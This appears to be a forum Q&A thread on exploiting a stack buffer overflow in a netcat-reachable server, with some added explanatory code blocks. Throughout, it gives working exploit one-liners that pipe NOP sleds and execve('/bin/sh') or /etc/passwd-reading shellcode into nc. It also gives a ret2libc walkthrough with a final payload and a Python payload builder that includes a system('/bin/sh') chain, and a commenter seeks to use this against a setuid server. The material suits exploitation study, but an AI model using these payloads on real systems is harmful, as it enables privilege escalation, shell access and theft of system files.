
I have a server (for reference: pastebin.com/ghJX69uH) that I can netcat to, and it asks me to input a message.

I know it is vulnerable to a buffer overflow, but I can't seem to get the shellcode to run. I have successfully pointed the return address back to the NOP slide, and it hits the /bin/sh shellcode, but it does not spawn a shell. Here is my code:

echo "`python -c 'print "\x90"*65517 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"  + "\xac\xf3\xfe\xbf"*10 + "\n"'`" | nc 127.0.0.1 1111

It's a simple buffer overflow with [NOP SLIDE | SHELLCODE (spawn shell /bin/sh) | return address]

The first image shows that the return address is 0xbffef3ac, which goes to the NOP sled, so all is OK! The second image shows a SIGSEGV with no shell; nothing happens.


What's going on here? I had a look at ebp and it showed something weird: my \x90s followed by what should be my shellcode, but it looks different. Any insights on what could be wrong or how to go about this?

0xbffef42c: 0x90909090  0x90909090  0x90909090  0x90909090
0xbffef43c: 0x90909090  0x90909090  0x90909090  0x90909090
0xbffef44c: 0x90909090  0x50c03190  0x732f2f68  0x622f6868
0xbffef45c: 0xe3896e69  0xbffef468  0x00000000  0x6e69622f
0xbffef46c: 0x68732f2f  0x00000000  0xbffef3ac  0xbffef3ac
0xbffef47c: 0xbffef3ac  0xbffef3ac  0xbffef3ac  0xbffef3ac
0xbffef48c: 0xbffef3ac  0x00000000  0x00000000  0x00000000
0xbffef49c: 0x00000000  0x00000000  0x00000000  0x00000000

Edit: The format of the code is from Numberphile; the shellcode is from http://shell-storm.org/shellcode/files/shellcode-827.php, which I ran and which spawns a shell. I tried adding padding (I put A's) between the shellcode and the return address, but something strange happens again:

New code: echo "`python -c 'print "\x90"*65490 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"  + "A"*27 + "\xac\xf4\xfe\xbf" + "\n"'`" | nc 127.0.0.1 1129


0xbffef42c: 0x90909090  0x90909090  0x90909090  0xc0319090
0xbffef43c: 0x2f2f6850  0x2f686873  0x896e6962  0x895350e3
0xbffef44c: 0xcd0bb0e1  0x41414180  0x41414141  0x41414141
0xbffef45c: 0x41414141  0x41414141  0x41414141  0x00000001
0xbffef46c: 0xbffef4ac  0x08049000  0x00000004  0xbffff4a4
0xbffef47c: 0xbffff490  0xbffff48c  0x00000004  0x00000000
0xbffef48c: 0x00000000  0x00000000  0x00000000  0x00000000
0xbffef49c: 0x00000000  0x00000000  0x00000000  0x00000000
0xbffef4ac: 0x00000000  0x00000000  0x00000000  0x00000000

Edit: So I managed to successfully print all of /etc/passwd, but I'm not sure why the /bin/sh shellcode doesn't work.

Works: /etc/passwd

echo "`python -c 'print "\x90"*65478+"\x31\xc9\x31\xc0\x31\xd2\x51\xb0\x05\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68\x2f\x2f\x65\x74\x89\xe3\xcd\x80\x89\xd9\x89\xc3\xb0\x03\x66\xba\xff\x0f\x66\x42\xcd\x80\x31\xc0\x31\xdb\xb3\x01\xb0\x04\xcd\x80\x31\xc0\xb0\x01\xcd\x80"  +"AAAA\x9c\xf3\xfe\xbf\x9c\xf3\xfe\xbf" + "\n"'`" | nc 127.0.0.1 2010

Doesn't work: /bin/sh

echo "`python -c 'print "\x90"*65513 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" + "AAAA\x9c\xf3\xfe\xbf\x9c\xf3\xfe\xbf\x9c" + "\n"'`" | nc 127.0.0.1 3003
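Decoding the two gdb dumps in the question, as an added example (this is not code from the question or from the answer). gdb prints each 32-bit word as a number, so on x86 the little-endian bytes of the shellcode look reversed inside every word; re-packing the words restores the byte string the CPU fetches. Run on the dumps above, the decoder shows the full 23-byte shellcode intact at 0xbffef43a in the second dump, but only its first 15 bytes in the first dump, followed at 0xbffef460 by a pointer to the string "/bin//sh" at 0xbffef468 and a NULL: these are the values the shellcode itself pushes, which is what the stack looks like when ESP sits just above the shellcode while it runs and its pushes land on its own tail (the mov al,0xb / int 0x80 bytes). It also shows that the second payload's return address 0xbffef4ac points at zero bytes, not at the sled. The dump text and the shellcode bytes are copied from the question; everything else is new.

```python
import re
import struct

# gdb word dumps copied from the question above (attempt 1 and attempt 2).
DUMP_ATTEMPT1 = """\
0xbffef42c: 0x90909090  0x90909090  0x90909090  0x90909090
0xbffef43c: 0x90909090  0x90909090  0x90909090  0x90909090
0xbffef44c: 0x90909090  0x50c03190  0x732f2f68  0x622f6868
0xbffef45c: 0xe3896e69  0xbffef468  0x00000000  0x6e69622f
0xbffef46c: 0x68732f2f  0x00000000  0xbffef3ac  0xbffef3ac
0xbffef47c: 0xbffef3ac  0xbffef3ac  0xbffef3ac  0xbffef3ac
0xbffef48c: 0xbffef3ac  0x00000000  0x00000000  0x00000000
0xbffef49c: 0x00000000  0x00000000  0x00000000  0x00000000
"""
DUMP_ATTEMPT2 = """\
0xbffef42c: 0x90909090  0x90909090  0x90909090  0xc0319090
0xbffef43c: 0x2f2f6850  0x2f686873  0x896e6962  0x895350e3
0xbffef44c: 0xcd0bb0e1  0x41414180  0x41414141  0x41414141
0xbffef45c: 0x41414141  0x41414141  0x41414141  0x00000001
0xbffef46c: 0xbffef4ac  0x08049000  0x00000004  0xbffff4a4
0xbffef47c: 0xbffff490  0xbffff48c  0x00000004  0x00000000
0xbffef48c: 0x00000000  0x00000000  0x00000000  0x00000000
0xbffef49c: 0x00000000  0x00000000  0x00000000  0x00000000
0xbffef4ac: 0x00000000  0x00000000  0x00000000  0x00000000
"""

# The 23-byte execve("/bin//sh") shellcode used in the question (shell-storm 827).
SHELLCODE_SH = bytes.fromhex("31c050682f2f7368682f62696e89e3505389e1b00bcd80")

LINE_RE = re.compile(r"^\s*0x([0-9a-fA-F]+):\s*(.*)$")


def parse_gdb_words(dump):
    """Return (base_address, memory_bytes) for an `x/Nxw`-style gdb dump.

    Each 0x........ word is re-packed little-endian, which is why the
    shellcode that "looks different" in the dump comes out byte-exact here.
    """
    base, mem = None, bytearray()
    for line in dump.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        addr = int(m.group(1), 16)
        if base is None:
            base = addr
        elif addr != base + len(mem):
            raise ValueError("dump is not contiguous at 0x%08x" % addr)
        for word in m.group(2).split():
            mem += struct.pack("<I", int(word, 16))
    return base, bytes(mem)


def bytes_at(base, mem, addr, n):
    """n bytes starting at addr, or None if the dump does not cover them."""
    off = addr - base
    if off < 0 or off + n > len(mem):
        return None
    return mem[off:off + n]


def read_u32(base, mem, addr):
    """Little-endian dword at addr (e.g. a pointer the shellcode pushed)."""
    chunk = bytes_at(base, mem, addr, 4)
    if chunk is None:
        raise ValueError("0x%08x is outside the dump" % addr)
    return struct.unpack("<I", chunk)[0]


def locate_shellcode(base, mem, shellcode, probe_len=4):
    """Find the shellcode by its first probe_len bytes and report how many
    leading bytes are still intact: (address, intact_len), or None."""
    best, start = None, 0
    while True:
        i = mem.find(shellcode[:probe_len], start)
        if i < 0:
            return best
        n = 0
        while n < len(shellcode) and i + n < len(mem) and mem[i + n] == shellcode[n]:
            n += 1
        if best is None or n > best[1]:
            best = (base + i, n)
        start = i + 1


def analyse(dump, shellcode, ret_addr):
    """Where the shellcode sits, how much of it survived, and the four bytes
    the overwritten return address points at (None if outside the dump)."""
    base, mem = parse_gdb_words(dump)
    found = locate_shellcode(base, mem, shellcode)
    return {
        "shellcode_at": found[0] if found else None,
        "intact": found[1] if found else 0,
        "ret_target": bytes_at(base, mem, ret_addr, 4),
    }


if __name__ == "__main__":
    for name, dump, ret in (("attempt 1", DUMP_ATTEMPT1, 0xbffef3ac),
                            ("attempt 2", DUMP_ATTEMPT2, 0xbffef4ac)):
        r = analyse(dump, SHELLCODE_SH, ret)
        print("%s: shellcode at 0x%08x, %d/%d bytes intact, ret -> %r"
              % (name, r["shellcode_at"], r["intact"], len(SHELLCODE_SH), r["ret_target"]))
    base, mem = parse_gdb_words(DUMP_ATTEMPT1)
    ptr = read_u32(base, mem, 0xbffef460)
    print("attempt 1: dword at 0xbffef460 = 0x%08x -> %r" % (ptr, bytes_at(base, mem, ptr, 9)))
```

Paste any later `x/32xw $esp` output into the same parser; a return address whose target decodes to 0x00 bytes or to the middle of a clobbered instruction explains a SIGSEGV without any need for the stack to be non-executable.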

1 Answer


We have two major stack protections against buffer overflows:

  • Stack canaries
  • Non-executable stack

You land on the NOP sled, but you get a segmentation fault, because your operating system marked the program stack as non-executable and the processor raises an exception when the program counter addresses that segment. But even if we have an executable stack (for GCC, use -z execstack), your program crashes:

[image: Arithmetic exception]

I changed the shellcode to read /etc/passwd; it works until another SIGSEGV. It is not relevant why your previous shellcode doesn't work; it is a practical problem.

[image: /etc/passwd shellcode works]

For another scenario:

How can we get around a non-executable stack? The most common way is a method called ret2libc (return to libc) using system(const char *). But we will use _exit(int) for simplicity. For our new attack, I compiled it with the non-executable stack option and sent the same stream.

$ nc localhost 1337 < exp.loit

Let's look at our stack:

[image: Stack]

We can't tell which part of your input overflows where, and we need that to pass the argument(s). I tried a different payload to find what goes where:

python -c 'print "\x90"*65482 + "\x31\xc9\x31\xc0\x31\xd2\x51\xb0\x05\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68\x2f\x2f\x65\x74\x89\xe3\xcd\x80\x89\xd9\x89\xc3\xb0\x03\x66\xba\xff\x0f\x66\x42\xcd\x80\x31\xc0\x31\xdb\xb3\x01\xb0\x04\xcd\x80\x31\xc0\xb0\x01\xcd\x80"  + "\x90"*12 + "\xac\xf3\xfe\xbf" +"\x00\x11\x22\x33"*2 + "\n"' > exp.loit

We get:

[image: Stack for new input]

We just need the _exit address:

gdb-peda$ p &_exit
$1 = (<text variable, no debug info> *) 0xb7ec6f24 <_exit>

Now we are ready to execute our exploit:

python -c 'print "\x90"*65482 + "\x31\xc9\x31\xc0\x31\xd2\x51\xb0\x05\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68\x2f\x2f\x65\x74\x89\xe3\xcd\x80\x89\xd9\x89\xc3\xb0\x03\x66\xba\xff\x0f\x66\x42\xcd\x80\x31\xc0\x31\xdb\xb3\x01\xb0\x04\xcd\x80\x31\xc0\xb0\x01\xcd\x80"  + "\x90"*12 + "\x24\x6f\xec\xb7" +"\x01\x00\x00\x00"*2 + "\n"' > exp.loit

[image: Final exploit]

Basically, that is ret2libc.
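The frame the answer builds for _exit, generalised into a small payload builder, as an added example; this is not the answer's own code. It packs the 32-bit ret2libc layout [&func][return-slot-for-func][arg0][arg1]... exactly as the answer's "\x24\x6f\xec\xb7" + "\x01\x00\x00\x00"*2 does, and also shows the classic [&system][&exit][&"/bin/sh"] chain. The _exit address 0xb7ec6f24 is the one gdb printed in the answer; the system, exit and "/bin/sh" addresses are hypothetical placeholders that must be read from the real (ASLR-disabled) target. The return-slot offset 65552 follows the answer's counts (65482 + 58 + 12); the question's own payloads put it at 65540 (65517 + 23, 65478 + 58 + 4, and so on), so measure it on the binary being attacked rather than trusting either number. The 58-byte shellcode is copied from the page.

```python
import struct


def p32(value):
    """Pack a 32-bit value little-endian, the byte order an x86 `ret` pops it in."""
    return struct.pack("<I", value)


# The 58-byte read-/etc/passwd shellcode used on the page, copied verbatim.
SHELLCODE_PASSWD = bytes.fromhex(
    "31c931c031d251b00568737377646863"
    "2f7061682f2f657489e3cd8089d989c3"
    "b00366baff0f6642cd8031c031dbb301"
    "b004cd8031c0b001cd80"
)


def ret2libc_frame(func_addr, args, next_ret):
    """Bytes that overwrite the saved return address and the slots above it.

    The vulnerable function's `ret` pops func_addr, leaving ESP on next_ret,
    which the libc function takes as *its* return address; the args follow in
    cdecl order. So [&_exit][1][1] calls _exit(1), and
    [&system][&exit][&"/bin/sh"] calls system("/bin/sh") and then returns into exit.
    """
    return p32(func_addr) + p32(next_ret) + b"".join(p32(a) for a in args)


def build_payload(shellcode, ret_offset, frame, filler=b"", nop=b"\x90"):
    """NOP sled | shellcode | filler | frame, with the frame starting ret_offset
    bytes into the buffer, i.e. exactly on the saved return address. With an NX
    stack the shellcode never runs, but keeping it leaves the offsets identical
    to the executable-stack attempt, which is what the answer relies on."""
    sled_len = ret_offset - len(shellcode) - len(filler)
    if sled_len < 0:
        raise ValueError("shellcode plus filler exceed ret_offset")
    return nop * sled_len + shellcode + filler + frame


def find_bad_bytes(data, bad):
    """Offsets of bytes the transport or copy routine would stop at
    (b"\\n" for a line-oriented reader, b"\\x00" for strcpy-style copies)."""
    return [i for i, b in enumerate(data) if b in bad]


# Address of _exit as printed by gdb in the answer (ASLR off in that session).
EXIT_ADDR = 0xb7ec6f24
# The answer's layout: 65482 NOPs + 58-byte shellcode + 12 NOPs = return slot at 65552.
ANSWER_RET_OFFSET = 65482 + len(SHELLCODE_PASSWD) + 12

answer_frame = ret2libc_frame(EXIT_ADDR, args=[1], next_ret=1)
answer_payload = build_payload(SHELLCODE_PASSWD, ANSWER_RET_OFFSET, answer_frame,
                               filler=b"\x90" * 12) + b"\n"

# Hypothetical addresses for the classic system("/bin/sh") chain; on a real
# target read them with gdb (p system / p exit / find &system,+9999999,"/bin/sh").
SYSTEM_ADDR = 0xb7e5b190
EXIT_LIBC_ADDR = 0xb7e4e9c0
BINSH_ADDR = 0xb7f7c7ec
system_frame = ret2libc_frame(SYSTEM_ADDR, args=[BINSH_ADDR], next_ret=EXIT_LIBC_ADDR)

if __name__ == "__main__":
    import sys
    print("payload %d bytes, frame at offset %d: %s"
          % (len(answer_payload), ANSWER_RET_OFFSET, answer_frame.hex()), file=sys.stderr)
    print("NUL bytes in frame at offsets:", find_bad_bytes(answer_frame, b"\x00"),
          file=sys.stderr)
    # Usage: python3 ret2libc.py | nc localhost 1337
    sys.stdout.buffer.write(answer_payload)
```

The bad-byte check matters for the _exit frame: the argument 1 and the fake return slot both contain NUL bytes. A server that copies the message with a length-based read passes them through, but a strcpy-style copy would cut the frame after the first 0x01, so compare what lands on the stack (the gdb dump) with what was sent before concluding that the libc call itself is at fault.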

  • Thanks for the writeup! While I experiment with this ret2libc, could you share what you used for "read /etc/passwd"? I replaced my shellcode with that and redid the NOP sled, but I'm still not able to get any result, strangely. Did you use a different format for your shellcode?
    – user153882
    Commented Mar 21, 2017 at 0:12
  • Oh, nvm, I had to view it from gdb using echo "`python -c 'print "\x90"*65482 + "\x31\xc9\x31\xc0\x31\xd2\x51\xb0\x05\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68\x2f\x2f\x65\x74\x89\xe3\xcd\x80\x89\xd9\x89\xc3\xb0\x03\x66\xba\xff\x0f\x66\x42\xcd\x80\x31\xc0\x31\xdb\xb3\x01\xb0\x04\xcd\x80\x31\xc0\xb0\x01\xcd\x80" + "\xac\xf3\xfe\xbf"*10 + "\n"'`" | nc 127.0.0.1 1111
    – user153882
    Commented Mar 21, 2017 at 0:29
  • I need to be able to do this with the given server, which has privileges to setuid / raise group privileges. Is there not a way to run it via the first way? If you are able to execute /etc/passwd, surely the no-exec stack isn't working and it is possible to run other commands?
    – user153882
    Commented Mar 21, 2017 at 2:07
  • Try to use python -c 'print "xxxxx"' | cat | nc localhost 1337 with working shellcode.
    Commented Mar 21, 2017 at 7:39
  • No success with that either; however, I've been told that for each connection a fork happens, and that a simple solution is to patch the fork instruction and make it single-threaded. I can use gdb's set follow-fork-mode child to follow the process. Anything else you can make from that hint?
    – user153882
    Commented Mar 21, 2017 at 16:17
